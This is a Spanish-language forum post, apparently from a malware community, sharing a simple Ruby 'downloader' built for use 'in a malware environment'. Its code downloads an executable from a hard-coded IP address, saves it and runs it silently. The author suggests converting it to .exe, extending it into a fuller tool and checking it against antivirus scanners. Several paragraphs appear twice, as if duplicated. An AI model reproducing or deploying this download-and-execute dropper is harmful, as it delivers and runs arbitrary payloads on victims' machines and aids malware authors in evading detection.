Ruby simple Downloader - Sanko
Publicado: 13 Sep 2012, 01:30
Bueno aqui estuve haciendo un simple downloader para ruby , lo hice como prueba para saber como actuaría en un entorno "de malware" , es muy básico pero tampoco lo voy a dar todo masticado , esta es una base a la cual podeís añadir cosillas para que sea una gran tool.
Código :
Para poder ejecutarlo en un entorno windows sin necesidad de que este disponga de un "emulador" para el lenguaje podeís convertir vuestro script.rb en una aplicación .exe , aqui os dejo el tutorial que hace un rato hice :
http://www.indetectables.net/viewtopic.php?f=99&t=42609
Lo peor de todo es que al pasarlo a .exe con ocra el tamaño de este pequeño código como cualquier otro aumenta considerablemente.
Aun asi puede decirse que no hay mucha gente que use ruby en un entorno hacia el malware , pero tiene futuro :
scanner de la aplicación :
Gracias Elsuc por escanearme el archivo.
Y aqui una muestra de como se comporta :

Código :
Código: Seleccionar todo
require 'Win32API'
require 'open-uri'
=begin
----------------------------------
| Coded by Sanko |
| Simple Ruby Downloader |
----------------------------------
=end
archivo = 'sk.exe' #Nombre del archivo a descargar
url = 'http://199.91.152.95/cz989jnk55qg/67fcyfx9xsf31mz/sk.exe' #Url directa del archivo a descargar
archivo = open(archivo,"wb") #se abre se escribe se lee y se cierra , lo que viene siendo una descarga...
archivo.write(open(url).read)
archivo.close
aplicacion = Thread.start do #Hacemos que system ejecute el archivo descargado
system 'sk.exe'
end
http://www.indetectables.net/viewtopic.php?f=99&t=42609
Lo peor de todo es que al pasarlo a .exe con ocra el tamaño de este pequeño código como cualquier otro aumenta considerablemente.
Aun asi puede decirse que no hay mucha gente que use ruby en un entorno hacia el malware , pero tiene futuro :
scanner de la aplicación :
Gracias Elsuc por escanearme el archivo.
Y aqui una muestra de como se comporta :
